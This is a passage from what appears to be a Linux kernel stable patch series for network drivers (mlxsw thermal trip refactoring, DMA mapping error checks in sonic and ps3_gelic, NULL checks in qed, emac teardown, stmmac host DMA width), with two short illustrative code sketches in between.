+-static const struct mlxsw_thermal_trip default_thermal_trips[] = {
++static const struct thermal_trip default_thermal_trips[] = {
+ 	{	/* In range - 0-40% PWM */
+ 		.type		= THERMAL_TRIP_ACTIVE,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_NORM,
+-		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-		.min_state	= 0,
+-		.max_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_NORM,
++		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 	},
+ 	{
+ 		/* In range - 40-100% PWM */
+ 		.type		= THERMAL_TRIP_ACTIVE,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_HIGH,
+-		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-		.min_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
+-		.max_state	= MLXSW_THERMAL_MAX_STATE,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HIGH,
++		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 	},
+ 	{	/* Warning */
+ 		.type		= THERMAL_TRIP_HOT,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_HOT,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HOT,
++	},
++};
++
++static const struct mlxsw_cooling_states default_cooling_states[] = {
++	{
++		.min_state	= 0,
++		.max_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++	},
++	{
++		.min_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++		.max_state	= MLXSW_THERMAL_MAX_STATE,
++	},
++	{
+ 		.min_state	= MLXSW_THERMAL_MAX_STATE,
+ 		.max_state	= MLXSW_THERMAL_MAX_STATE,
+ 	},
+@@ -78,7 +84,8 @@ struct mlxsw_thermal;
+ struct mlxsw_thermal_module {
+ 	struct mlxsw_thermal *parent;
+ 	struct thermal_zone_device *tzdev;
+-	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
+ 	int module; /* Module or gearbox number */
+ 	u8 slot_index;
+ };
+@@ -98,8 +105,8 @@ struct mlxsw_thermal {
+ 	struct thermal_zone_device *tzdev;
+ 	int polling_delay;
+ 	struct thermal_cooling_device *cdevs[MLXSW_MFCR_PWMS_MAX];
+-	u8 cooling_levels[MLXSW_THERMAL_MAX_STATE + 1];
+-	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
+ 	struct mlxsw_thermal_area line_cards[];
+ };
+ 
+@@ -136,9 +143,9 @@ static int mlxsw_get_cooling_device_idx(struct mlxsw_thermal *thermal,
+ static void
+ mlxsw_thermal_module_trips_reset(struct mlxsw_thermal_module *tz)
+ {
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = 0;
+ }
+ 
+ static int
+@@ -180,12 +187,12 @@ mlxsw_thermal_module_trips_update(struct device *dev, struct mlxsw_core *core,
+ 	 * by subtracting double hysteresis value.
+ 	 */
+ 	if (crit_temp >= MLXSW_THERMAL_MODULE_TEMP_SHIFT)
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp -
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp -
+ 					MLXSW_THERMAL_MODULE_TEMP_SHIFT;
+ 	else
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = emerg_temp;
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = emerg_temp;
+ 
+ 	return 0;
+ }
+@@ -202,11 +209,11 @@ static int mlxsw_thermal_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_thermal_trip *trip = &thermal->trips[i];
++		const struct mlxsw_cooling_states *state = &thermal->cooling_states[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       trip->max_state,
+-						       trip->min_state,
++						       state->max_state,
++						       state->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0) {
+ 			dev_err(dev, "Failed to bind cooling device to trip %d\n", i);
+@@ -260,61 +267,6 @@ static int mlxsw_thermal_get_temp(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
+-static int mlxsw_thermal_get_trip_type(struct thermal_zone_device *tzdev,
+-				       int trip,
+-				       enum thermal_trip_type *p_type)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_type = thermal->trips[trip].type;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_get_trip_temp(struct thermal_zone_device *tzdev,
+-				       int trip, int *p_temp)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_temp = thermal->trips[trip].temp;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_set_trip_temp(struct thermal_zone_device *tzdev,
+-				       int trip, int temp)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	thermal->trips[trip].temp = temp;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_get_trip_hyst(struct thermal_zone_device *tzdev,
+-				       int trip, int *p_hyst)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	*p_hyst = thermal->trips[trip].hyst;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_set_trip_hyst(struct thermal_zone_device *tzdev,
+-				       int trip, int hyst)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	thermal->trips[trip].hyst = hyst;
+-	return 0;
+-}
+-
+ static struct thermal_zone_params mlxsw_thermal_params = {
+ 	.no_hwmon = true,
+ };
+@@ -323,11 +275,6 @@ static struct thermal_zone_device_ops mlxsw_thermal_ops = {
+ 	.bind = mlxsw_thermal_bind,
+ 	.unbind = mlxsw_thermal_unbind,
+ 	.get_temp = mlxsw_thermal_get_temp,
+-	.get_trip_type	= mlxsw_thermal_get_trip_type,
+-	.get_trip_temp	= mlxsw_thermal_get_trip_temp,
+-	.set_trip_temp	= mlxsw_thermal_set_trip_temp,
+-	.get_trip_hyst	= mlxsw_thermal_get_trip_hyst,
+-	.set_trip_hyst	= mlxsw_thermal_set_trip_hyst,
+ };
+ 
+ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+@@ -342,11 +289,11 @@ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_thermal_trip *trip = &tz->trips[i];
++		const struct mlxsw_cooling_states *state = &tz->cooling_states[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       trip->max_state,
+-						       trip->min_state,
++						       state->max_state,
++						       state->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0)
+ 			goto err_thermal_zone_bind_cooling_device;
+@@ -434,74 +381,10 @@ static int mlxsw_thermal_module_temp_get(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
+-static int
+-mlxsw_thermal_module_trip_type_get(struct thermal_zone_device *tzdev, int trip,
+-				   enum thermal_trip_type *p_type)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_type = tz->trips[trip].type;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_temp_get(struct thermal_zone_device *tzdev,
+-				   int trip, int *p_temp)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_temp = tz->trips[trip].temp;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_temp_set(struct thermal_zone_device *tzdev,
+-				   int trip, int temp)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	tz->trips[trip].temp = temp;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_hyst_get(struct thermal_zone_device *tzdev, int trip,
+-				   int *p_hyst)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	*p_hyst = tz->trips[trip].hyst;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_hyst_set(struct thermal_zone_device *tzdev, int trip,
+-				   int hyst)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	tz->trips[trip].hyst = hyst;
+-	return 0;
+-}
+-
+ static struct thermal_zone_device_ops mlxsw_thermal_module_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_module_temp_get,
+-	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
+-	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
+-	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
+-	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
+-	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_gearbox_temp_get(struct thermal_zone_device *tzdev,
+@@ -531,11 +414,6 @@ static struct thermal_zone_device_ops mlxsw_thermal_gearbox_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_gearbox_temp_get,
+-	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
+-	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
+-	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
+-	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
+-	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_get_max_state(struct thermal_cooling_device *cdev,
+@@ -589,7 +467,7 @@ static int mlxsw_thermal_set_cur_state(struct thermal_cooling_device *cdev,
+ 		return idx;
+ 
+ 	/* Normalize the state to the valid speed range. */
+-	state = thermal->cooling_levels[state];
++	state = max_t(unsigned long, MLXSW_THERMAL_MIN_STATE, state);
+ 	mlxsw_reg_mfsc_pack(mfsc_pl, idx, mlxsw_state_to_duty(state));
+ 	err = mlxsw_reg_write(thermal->core, MLXSW_REG(mfsc), mfsc_pl);
+ 	if (err) {
+@@ -617,7 +495,8 @@ mlxsw_thermal_module_tz_init(struct mlxsw_thermal_module *module_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-module%d",
+ 			 module_tz->module + 1);
+-	module_tz->tzdev = thermal_zone_device_register(tz_name,
++	module_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
++							module_tz->trips,
+ 							MLXSW_THERMAL_NUM_TRIPS,
+ 							MLXSW_THERMAL_TRIP_MASK,
+ 							module_tz,
+@@ -661,6 +540,8 @@ mlxsw_thermal_module_init(struct device *dev, struct mlxsw_core *core,
+ 	module_tz->parent = thermal;
+ 	memcpy(module_tz->trips, default_thermal_trips,
+ 	       sizeof(thermal->trips));
++	memcpy(module_tz->cooling_states, default_cooling_states,
++	       sizeof(thermal->cooling_states));
+ 	/* Initialize all trip point. */
+ 	mlxsw_thermal_module_trips_reset(module_tz);
+ 	/* Read module temperature and thresholds. */
+@@ -756,7 +637,8 @@ mlxsw_thermal_gearbox_tz_init(struct mlxsw_thermal_module *gearbox_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-gearbox%d",
+ 			 gearbox_tz->module + 1);
+-	gearbox_tz->tzdev = thermal_zone_device_register(tz_name,
++	gearbox_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
++						gearbox_tz->trips,
+ 						MLXSW_THERMAL_NUM_TRIPS,
+ 						MLXSW_THERMAL_TRIP_MASK,
+ 						gearbox_tz,
+@@ -813,6 +695,8 @@ mlxsw_thermal_gearboxes_init(struct device *dev, struct mlxsw_core *core,
+ 		gearbox_tz = &area->tz_gearbox_arr[i];
+ 		memcpy(gearbox_tz->trips, default_thermal_trips,
+ 		       sizeof(thermal->trips));
++		memcpy(gearbox_tz->cooling_states, default_cooling_states,
++		       sizeof(thermal->cooling_states));
+ 		gearbox_tz->module = i;
+ 		gearbox_tz->parent = thermal;
+ 		gearbox_tz->slot_index = area->slot_index;
+@@ -928,6 +812,7 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 	thermal->core = core;
+ 	thermal->bus_info = bus_info;
+ 	memcpy(thermal->trips, default_thermal_trips, sizeof(thermal->trips));
++	memcpy(thermal->cooling_states, default_cooling_states, sizeof(thermal->cooling_states));
+ 	thermal->line_cards[0].slot_index = 0;
+ 
+ 	err = mlxsw_reg_query(thermal->core, MLXSW_REG(mfcr), mfcr_pl);
+@@ -973,15 +858,12 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 		}
+ 	}
+ 
+-	/* Initialize cooling levels per PWM state. */
+-	for (i = 0; i < MLXSW_THERMAL_MAX_STATE; i++)
+-		thermal->cooling_levels[i] = max(MLXSW_THERMAL_MIN_STATE, i);
+-
+ 	thermal->polling_delay = bus_info->low_frequency ?
+ 				 MLXSW_THERMAL_SLOW_POLL_INT :
+ 				 MLXSW_THERMAL_POLL_INT;
+ 
+-	thermal->tzdev = thermal_zone_device_register("mlxsw",
++	thermal->tzdev = thermal_zone_device_register_with_trips("mlxsw",
++						      thermal->trips,
+ 						      MLXSW_THERMAL_NUM_TRIPS,
+ 						      MLXSW_THERMAL_TRIP_MASK,
+ 						      thermal,
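
/*
 * Illustrative sketch, not taken from the patch above: drivers that used
 * to implement get/set_trip_* callbacks can instead hand the core a
 * struct thermal_trip array via thermal_zone_device_register_with_trips()
 * and let the thermal core answer trip queries. Zone name, trip values
 * and delays below are made up.
 */
#include <linux/thermal.h>

static struct thermal_trip ex_trips[] = {
	{ .temperature = 75000, .hysteresis = 5000, .type = THERMAL_TRIP_ACTIVE },
	{ .temperature = 85000, .hysteresis = 5000, .type = THERMAL_TRIP_HOT },
};

static struct thermal_zone_device *
ex_thermal_register(void *priv, struct thermal_zone_device_ops *ops)
{
	/* mask 0: no trip is writable from user space */
	return thermal_zone_device_register_with_trips("ex-zone", ex_trips,
						       ARRAY_SIZE(ex_trips), 0,
						       priv, ops, NULL, 0, 1000);
}
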
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
+index 045a24cacfa51..b6ee2d658b0c4 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
+@@ -1354,7 +1354,7 @@ static int mlxsw_sp_fid_8021q_port_vid_map(struct mlxsw_sp_fid *fid,
+ 					   u16 vid)
+ {
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_sp_port->mlxsw_sp;
+-	u8 local_port = mlxsw_sp_port->local_port;
++	u16 local_port = mlxsw_sp_port->local_port;
+ 	int err;
+ 
+ 	/* In case there are no {Port, VID} => FID mappings on the port,
+@@ -1391,7 +1391,7 @@ mlxsw_sp_fid_8021q_port_vid_unmap(struct mlxsw_sp_fid *fid,
+ 				  struct mlxsw_sp_port *mlxsw_sp_port, u16 vid)
+ {
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_sp_port->mlxsw_sp;
+-	u8 local_port = mlxsw_sp_port->local_port;
++	u16 local_port = mlxsw_sp_port->local_port;
+ 
+ 	mlxsw_sp_fid_port_vid_list_del(fid, mlxsw_sp_port->local_port, vid);
+ 	mlxsw_sp_fid_evid_map(fid, local_port, vid, false);
+diff --git a/drivers/net/ethernet/natsemi/sonic.c b/drivers/net/ethernet/natsemi/sonic.c
+index d17d1b4f2585f..825356ee3492e 100644
+--- a/drivers/net/ethernet/natsemi/sonic.c
++++ b/drivers/net/ethernet/natsemi/sonic.c
+@@ -292,7 +292,7 @@ static int sonic_send_packet(struct sk_buff *skb, struct net_device *dev)
+ 	 */
+ 
+ 	laddr = dma_map_single(lp->device, skb->data, length, DMA_TO_DEVICE);
+-	if (!laddr) {
++	if (dma_mapping_error(lp->device, laddr)) {
+ 		pr_err_ratelimited("%s: failed to map tx DMA buffer.\n", dev->name);
+ 		dev_kfree_skb_any(skb);
+ 		return NETDEV_TX_OK;
+@@ -509,7 +509,7 @@ static bool sonic_alloc_rb(struct net_device *dev, struct sonic_local *lp,
+ 
+ 	*new_addr = dma_map_single(lp->device, skb_put(*new_skb, SONIC_RBSIZE),
+ 				   SONIC_RBSIZE, DMA_FROM_DEVICE);
+-	if (!*new_addr) {
++	if (dma_mapping_error(lp->device, *new_addr)) {
+ 		dev_kfree_skb(*new_skb);
+ 		*new_skb = NULL;
+ 		return false;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_sriov.c b/drivers/net/ethernet/qlogic/qed/qed_sriov.c
+index 0848b5529d48a..911509c2b17d5 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_sriov.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_sriov.c
+@@ -4404,6 +4404,9 @@ qed_iov_configure_min_tx_rate(struct qed_dev *cdev, int vfid, u32 rate)
+ 	}
+ 
+ 	vf = qed_iov_get_vf_info(QED_LEADING_HWFN(cdev), (u16)vfid, true);
++	if (!vf)
++		return -EINVAL;
++
+ 	vport_id = vf->vport_id;
+ 
+ 	return qed_configure_vport_wfq(cdev, vport_id, rate);
+@@ -5152,7 +5155,7 @@ static void qed_iov_handle_trust_change(struct qed_hwfn *hwfn)
+ 
+ 		/* Validate that the VF has a configured vport */
+ 		vf = qed_iov_get_vf_info(hwfn, i, true);
+-		if (!vf->vport_instance)
++		if (!vf || !vf->vport_instance)
+ 			continue;
+ 
+ 		memset(&params, 0, sizeof(params));
+diff --git a/drivers/net/ethernet/qualcomm/emac/emac.c b/drivers/net/ethernet/qualcomm/emac/emac.c
+index 3115b2c128980..eaa50050aa0b7 100644
+--- a/drivers/net/ethernet/qualcomm/emac/emac.c
++++ b/drivers/net/ethernet/qualcomm/emac/emac.c
+@@ -724,9 +724,15 @@ static int emac_remove(struct platform_device *pdev)
+ 	struct net_device *netdev = dev_get_drvdata(&pdev->dev);
+ 	struct emac_adapter *adpt = netdev_priv(netdev);
+ 
++	netif_carrier_off(netdev);
++	netif_tx_disable(netdev);
++
+ 	unregister_netdev(netdev);
+ 	netif_napi_del(&adpt->rx_q.napi);
+ 
++	free_irq(adpt->irq.irq, &adpt->irq);
++	cancel_work_sync(&adpt->work_thread);
++
+ 	emac_clks_teardown(adpt);
+ 
+ 	put_device(&adpt->phydev->mdio.dev);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/common.h b/drivers/net/ethernet/stmicro/stmmac/common.h
+index 6b5d96bced475..ec9c130276d89 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/common.h
++++ b/drivers/net/ethernet/stmicro/stmmac/common.h
+@@ -418,6 +418,7 @@ struct dma_features {
+ 	unsigned int frpbs;
+ 	unsigned int frpes;
+ 	unsigned int addr64;
++	unsigned int host_dma_width;
+ 	unsigned int rssen;
+ 	unsigned int vlhash;
+ 	unsigned int sphen;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
+index bd52fb7cf4860..0d6a84199fd8a 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
+@@ -251,7 +251,7 @@ static int imx_dwmac_probe(struct platform_device *pdev)
+ 		goto err_parse_dt;
+ 	}
+ 
+-	plat_dat->addr64 = dwmac->ops->addr_width;
++	plat_dat->host_dma_width = dwmac->ops->addr_width;
+ 	plat_dat->init = imx_dwmac_init;
+ 	plat_dat->exit = imx_dwmac_exit;
+ 	plat_dat->clks_config = imx_dwmac_clks_config;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+index 7deb1f817dacc..13aa919633b47 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+@@ -684,7 +684,7 @@ static int ehl_pse0_common_data(struct pci_dev *pdev,
+ 
+ 	intel_priv->is_pse = true;
+ 	plat->bus_id = 2;
+-	plat->addr64 = 32;
++	plat->host_dma_width = 32;
+ 
+ 	plat->clk_ptp_rate = 200000000;
+ 
+@@ -725,7 +725,7 @@ static int ehl_pse1_common_data(struct pci_dev *pdev,
+ 
+ 	intel_priv->is_pse = true;
+ 	plat->bus_id = 3;
+-	plat->addr64 = 32;
++	plat->host_dma_width = 32;
+ 
+ 	plat->clk_ptp_rate = 200000000;
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+index 2f7d8e4561d92..9ae31e3dc8218 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+@@ -591,7 +591,7 @@ static int mediatek_dwmac_common_data(struct platform_device *pdev,
+ 	plat->use_phy_wol = priv_plat->mac_wol ? 0 : 1;
+ 	plat->riwt_off = 1;
+ 	plat->maxmtu = ETH_DATA_LEN;
+-	plat->addr64 = priv_plat->variant->dma_bit_mask;
++	plat->host_dma_width = priv_plat->variant->dma_bit_mask;
+ 	plat->bsp_priv = priv_plat;
+ 	plat->init = mediatek_dwmac_init;
+ 	plat->clks_config = mediatek_dwmac_clks_config;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 3c1d4b27668fe..93321437f0933 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1429,7 +1429,7 @@ static int stmmac_init_rx_buffers(struct stmmac_priv *priv,
+ 	struct stmmac_rx_buffer *buf = &rx_q->buf_pool[i];
+ 	gfp_t gfp = (GFP_ATOMIC | __GFP_NOWARN);
+ 
+-	if (priv->dma_cap.addr64 <= 32)
++	if (priv->dma_cap.host_dma_width <= 32)
+ 		gfp |= GFP_DMA32;
+ 
+ 	if (!buf->page) {
+@@ -4585,7 +4585,7 @@ static inline void stmmac_rx_refill(struct stmmac_priv *priv, u32 queue)
+ 	unsigned int entry = rx_q->dirty_rx;
+ 	gfp_t gfp = (GFP_ATOMIC | __GFP_NOWARN);
+ 
+-	if (priv->dma_cap.addr64 <= 32)
++	if (priv->dma_cap.host_dma_width <= 32)
+ 		gfp |= GFP_DMA32;
+ 
+ 	while (dirty-- > 0) {
+@@ -6201,7 +6201,7 @@ static int stmmac_dma_cap_show(struct seq_file *seq, void *v)
+ 	seq_printf(seq, "\tFlexible RX Parser: %s\n",
+ 		   priv->dma_cap.frpsel ? "Y" : "N");
+ 	seq_printf(seq, "\tEnhanced Addressing: %d\n",
+-		   priv->dma_cap.addr64);
++		   priv->dma_cap.host_dma_width);
+ 	seq_printf(seq, "\tReceive Side Scaling: %s\n",
+ 		   priv->dma_cap.rssen ? "Y" : "N");
+ 	seq_printf(seq, "\tVLAN Hash Filtering: %s\n",
+@@ -7171,20 +7171,22 @@ int stmmac_dvr_probe(struct device *device,
+ 		dev_info(priv->device, "SPH feature enabled\n");
+ 	}
+ 
+-	/* The current IP register MAC_HW_Feature1[ADDR64] only define
+-	 * 32/40/64 bit width, but some SOC support others like i.MX8MP
+-	 * support 34 bits but it map to 40 bits width in MAC_HW_Feature1[ADDR64].
+-	 * So overwrite dma_cap.addr64 according to HW real design.
++	/* Ideally our host DMA address width is the same as for the
++	 * device. However, it may differ and then we have to use our
++	 * host DMA width for allocation and the device DMA width for
++	 * register handling.
+ 	 */
+-	if (priv->plat->addr64)
+-		priv->dma_cap.addr64 = priv->plat->addr64;
++	if (priv->plat->host_dma_width)
++		priv->dma_cap.host_dma_width = priv->plat->host_dma_width;
++	else
++		priv->dma_cap.host_dma_width = priv->dma_cap.addr64;
+ 
+-	if (priv->dma_cap.addr64) {
++	if (priv->dma_cap.host_dma_width) {
+ 		ret = dma_set_mask_and_coherent(device,
+-				DMA_BIT_MASK(priv->dma_cap.addr64));
++				DMA_BIT_MASK(priv->dma_cap.host_dma_width));
+ 		if (!ret) {
+-			dev_info(priv->device, "Using %d bits DMA width\n",
+-				 priv->dma_cap.addr64);
++			dev_info(priv->device, "Using %d/%d bits DMA host/device width\n",
++				 priv->dma_cap.host_dma_width, priv->dma_cap.addr64);
+ 
+ 			/*
+ 			 * If more than 32 bits can be addressed, make sure to
+@@ -7199,7 +7201,7 @@ int stmmac_dvr_probe(struct device *device,
+ 				goto error_hw_init;
+ 			}
+ 
+-			priv->dma_cap.addr64 = 32;
++			priv->dma_cap.host_dma_width = 32;
+ 		}
+ 	}
+ 
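
/*
 * Rough sketch of the host/device DMA width split introduced above:
 * host_dma_width drives host-side allocations and the DMA mask, while
 * addr64 keeps describing the device's register-level capability.
 * Structure and helper names are invented for illustration.
 */
#include <linux/dma-mapping.h>

struct ex_dma_caps {
	unsigned int addr64;		/* device width from HW features */
	unsigned int host_dma_width;	/* width used on the host side */
};

static void ex_pick_dma_width(struct device *dev, struct ex_dma_caps *cap,
			      unsigned int platform_width)
{
	/* A platform override wins; otherwise mirror the device width. */
	cap->host_dma_width = platform_width ? platform_width : cap->addr64;

	if (cap->host_dma_width &&
	    dma_set_mask_and_coherent(dev, DMA_BIT_MASK(cap->host_dma_width)))
		cap->host_dma_width = 32;	/* conservative fallback */
}
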
+diff --git a/drivers/net/ethernet/toshiba/ps3_gelic_net.c b/drivers/net/ethernet/toshiba/ps3_gelic_net.c
+index cf8de8a7a8a1e..9d535ae596266 100644
+--- a/drivers/net/ethernet/toshiba/ps3_gelic_net.c
++++ b/drivers/net/ethernet/toshiba/ps3_gelic_net.c
+@@ -317,15 +317,17 @@ static int gelic_card_init_chain(struct gelic_card *card,
+ 
+ 	/* set up the hardware pointers in each descriptor */
+ 	for (i = 0; i < no; i++, descr++) {
++		dma_addr_t cpu_addr;
++
+ 		gelic_descr_set_status(descr, GELIC_DESCR_DMA_NOT_IN_USE);
+-		descr->bus_addr =
+-			dma_map_single(ctodev(card), descr,
+-				       GELIC_DESCR_SIZE,
+-				       DMA_BIDIRECTIONAL);
+ 
+-		if (!descr->bus_addr)
++		cpu_addr = dma_map_single(ctodev(card), descr,
++					  GELIC_DESCR_SIZE, DMA_BIDIRECTIONAL);
++
++		if (dma_mapping_error(ctodev(card), cpu_addr))
+ 			goto iommu_error;
+ 
++		descr->bus_addr = cpu_to_be32(cpu_addr);
+ 		descr->next = descr + 1;
+ 		descr->prev = descr - 1;
+ 	}
+@@ -365,26 +367,28 @@ iommu_error:
+  *
+  * allocates a new rx skb, iommu-maps it and attaches it to the descriptor.
+  * Activate the descriptor state-wise
++ *
++ * Gelic RX sk_buffs must be aligned to GELIC_NET_RXBUF_ALIGN and the length
++ * must be a multiple of GELIC_NET_RXBUF_ALIGN.
+  */
+ static int gelic_descr_prepare_rx(struct gelic_card *card,
+ 				  struct gelic_descr *descr)
+ {
++	static const unsigned int rx_skb_size =
++		ALIGN(GELIC_NET_MAX_FRAME, GELIC_NET_RXBUF_ALIGN) +
++		GELIC_NET_RXBUF_ALIGN - 1;
++	dma_addr_t cpu_addr;
+ 	int offset;
+-	unsigned int bufsize;
+ 
+ 	if (gelic_descr_get_status(descr) !=  GELIC_DESCR_DMA_NOT_IN_USE)
+ 		dev_info(ctodev(card), "%s: ERROR status\n", __func__);
+-	/* we need to round up the buffer size to a multiple of 128 */
+-	bufsize = ALIGN(GELIC_NET_MAX_MTU, GELIC_NET_RXBUF_ALIGN);
+ 
+-	/* and we need to have it 128 byte aligned, therefore we allocate a
+-	 * bit more */
